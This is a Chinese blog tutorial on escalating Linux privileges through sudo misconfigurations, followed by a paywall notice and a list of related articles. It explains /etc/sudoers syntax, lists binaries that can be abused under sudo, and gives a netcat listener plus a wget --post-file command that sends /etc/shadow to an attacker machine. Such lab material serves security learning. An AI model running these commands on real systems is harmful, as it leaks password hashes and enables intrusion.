Linux提权——SUDO

最新推荐文章于 2026-05-05 00:23:32 发布

原创

最新推荐文章于 2026-05-05 00:23:32 发布 · 1.1w 阅读

标签

#linux #网络安全

收录于

使用Sudo权限提升Linux账户权限

在Linux/Unix中，/etc/sudoers文件是sudo权限的配置文件，其中储存了一些用户或组可以以root权限使用的命令。如下图
在这里插入图片描述

Sudoer文件语法

假如我们（root用户）要给普通用户test分配sudo权限，请输出vim /etc/sudoers打开文件进行编辑，找到root权限root ALL=(ALL:ALL) ALL，在下一行输入
test ALL(ALL:ALL) ALL，保存后退出，这样即表示用户test可以使用sudo调用root权限执行命令。

给普通用户设置 sudo权限

打开 /etc/sudoers 文件

vim /etc/sudoers

给普通用户test 的wget命令添加sudo权限供下面进行提权测试

test   ALL(ALL:ALL) /usr/bin/wget

或者直接给于用户root权限，下面测试时不必来回修改

test   ALL(ALL:ALL)   ALL

提权命令总览

可以利用sudo提权的命令如下

wget、find、cat、apt、zip、xxd、time、taskset、git、sed、pip、ed、tmux、scp、perl、bash、less、awk、man、vi、env、ftp

sudo wget提权

Wget 命令是一个命令行实用程序，它使用户能够借助许多协议（如 HTTP、HTTPS 和 FTP）从 Internet 或服务器同时下载单个或多个文件。
wget 提权的原理是：
使用–post-file参数将/etc/shadow的内容发送到监听IP并保存未hash.txt（kali）

##kali上监听
nc -lvp 4444 > hash.txt

##靶机上
/usr/bin/wget --post-file=/etc/shadow 192.168.0.114:4444

在这里插入图片描述

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Thgilil

关注关注

14
点赞
踩
94

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

Linux提权方法总结

渗透之路，攻防之间皆学问

03-23

7272

当我们拿到了一台Linux服务器的低权限账号，于是，我们想要通过技术手段提权至root用户权限,以执行更多的操作。

参与评论您还未登录，请先登录后发表或查看评论

[权限提升] Linux 提权 & 维持 — 系统错误配置提权 - Sudo 滥用提权

Blue17 の小窝

02-08

1616

Sudo 提权的原理与之前讲解的 [[Linux 提权 & 维持 — 系统错误配置提权 - SUID 文件提权|SUID 文件提权]] 有异曲同工之妙，都是结合权限与命令的特性进行提权。提权的前提肯定是你先拿到了一台机器的权限，所以我们得先让靶机上线到 Kali 中。git 的 Sudo 提权比较特别，需要使用两条命令（后面还有几条命令用法与 git 是一样的）。在一些应用场景中，为了方便运维人员以低权限账号进行运维，往往会开启账号的一些 SUDO 权限给运维账号，而 SUDO 权限的授予则是在。

Linux上sudo提权使用方法简介

树下一少年的博客

01-09

1万+

本文详细介绍了在CentOS7系统中配置sudo权限的方法。主要内容包括：1.通过编辑/etc/sudoers文件或使用visudo命令为用户分配sudo权限；2.配置免密码sudo操作；3.测试和验证sudo配置效果；4.介绍常用sudo命令参数，如-h查看帮助、-l列出权限、-u指定用户执行命令、-k临时要求密码验证等。文中提供了具体操作步骤和示例，帮助管理员为普通用户配置提权操作，同时确保系统安全性。

【Linux】sudo提升权限（入门）

m0_73726899的博客

08-08

2829

sudo命令以系统管理者的身份执行指令，也就是说，经由 sudo 所执行的指令就好像是 root 亲自执行。

从sudo配置到Root Shell：Linux Sudo提权全景深度解析与防御指南

最新发布

c_program113的博客

05-05

517

作为Linux权限管理的核心工具，sudo（Superuser Do）的设计初衷是践行「最小权限原则」。但在实际运维中，过度授权、配置疏漏以及软件自身的高危漏洞，往往让这个“安全阀门”变成通往root权限的直通车。本文将从底层机制、配置错误、2025-2026年最新高危漏洞复现、防御体系四个维度进行深度解析。

linux 提权总结

weixin_51681694的博客

06-13

8850

会继续补充.....

Linux提权-70种sudo提权汇总

LINGX5的博客

08-29

1841

命令有 sudo 的权限，我们该如何进行提权呢？跟着红队笔记大佬，汇总了一下当我们有sudo -l时，70条命令可以提权的sudo风暴视频连接: https://www.bilibili.com/video/BV1DV4y1U7bT/?

Linux下的全部sudo提权方法

qq_62554190的博客

07-04

1794

linux下的全部sudo提权

Linux提权-02 sudo提权

weixin_45626840的博客

01-19

1284

执行权限继承：当用户执行sudo后面跟随的命令时，这个命令会继承sudo的权限。在这种情况下，虽然用户是普通用户，但由于sudo在以root用户的身份执行，随后的命令则也可以在root权限下运行。设置setuid权限：sudo程序本身被设置了setuid属性，这意味着当任何用户执行这个程序时，它会以程序拥有者（通常是root）的权限运行。权限配置不当，如果这些可执行文件本身又可以调用其他可执行文件，或者可以更改系统的一些配置选项，就可以达到提权的目的。

linux sudo指令提权

稻草人敲代码的博客

01-20

1933

su指令可实现普通用户和root(超级管理员)之间的交换，值得注意的是，su默认只是切换身份，并没有切换环境变量，环境变量依然是普通用户的。但是修改sudoers文件是一件非常敏感的事情，需要足够的权限，所以一般只允许root用户修改。，只要是涉及到高权限的指令就必须要root来运行，这样的话，超级管理员显然太累了。在前面的博客中我们学习了用户权限的概念，对用户权限还不了解的朋友可以去看一看。一般来说，身为普通用户是不可以使用超级管理员的权限的，但是考虑到。的名称是 "superuser do" 的缩写。

linux提权详细(超级全)

热门推荐

qq_74806534的博客

01-28

2万+

Linux 中特权升级的最终目标是获得root用户。

Linux提权大全

yggcwhat

05-14

9944

Linux提权大全

Linux提权

m0_57856283的博客

03-12

1万+

将这个虚拟文件导入虚拟机开机默认没密码账号：Bob 密码：secret root账号密码secret123 进去之后是这样的我们先查看他的ip地址这里我们看到他是没有IP地址的我们先切换到root账户进来之后需要改一个配置文件然后我们看到了它已经获取到了ip 然后我们打开kali远程到被害机，注意，我们用普通用户远程过去 ssh bob@192.168.179.138 我们可以看到他已经远程了过来过来之后我们可以先·看看他是什...

Linux常用六种提权方式

lza20001103的博客

04-21

2363

Linux常用六种提权方式

Linux中的提权操作

weixin_52757485的博客

08-01

2552

具体工作过程：当用户执行sudo时，系统会主动寻找/etc/sudoers文件，判断该用户是否有执行sudo的权限，确认用户具有执行权限后，让用户输入用户自己的密码确认，若密码输入成功，则开始执行sudo后续的命令。临时提权的方法是用sudo的工作原理：将当前用户切换到超级用户下，以超级用户身份执行命令，执行完成后，直接退回到当前用户。[root@localhost ~]# vim /etc/sudoers （进入/etc/sudoers）（成功在普通用户下临时提权）

内网渗透-Linux提权之sudo提权

lza20001103的博客

04-06

1206

内网渗透-Linux提权之sudo提权

Linux用户管理及sudo提权

vayneX的博客

09-03

3880

目录一、用户及组管理 1.管理用户帐号 1.1 添加用户（useradd） 1.2 检查用户属性（id） 1.3 修改用户属性（usermod） 1.3 设置登陆密码（passwd） 1.4 设置帐号有效期（chage） 1.5 锁定用户帐号（passwd） 1.6 删除用户（userdel） 2. 管理用户组 2.1 添加用户组（groupadd） 2.2 管理组...

Linux中sudo提权

qq_41123867的博客

03-27

2955

一、原理 sudo是linux中临时使用其他用户命令(一般是root)的一种机制，使用sudo+命令时，将以root用户的身份执行命令。如果在执行命令的过程中，可以输入打开shell的脚本，系统将打开一个用户为root的shell，从而实现提权。二、可以用来提权的命令 vi more less git 三、提权过程环境：DC-2靶机，基于Debian7.11，已经拥有一个可以用ssh连接的低权...

Linux之sudo滥用提权

渗透之路，攻防之间皆学问

03-22

3284

sudo是linux系统管理指令，是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具，如halt，reboot，su等等。换句话说通过此命令可以让非root的用户运行只有root才有权限执行的命令。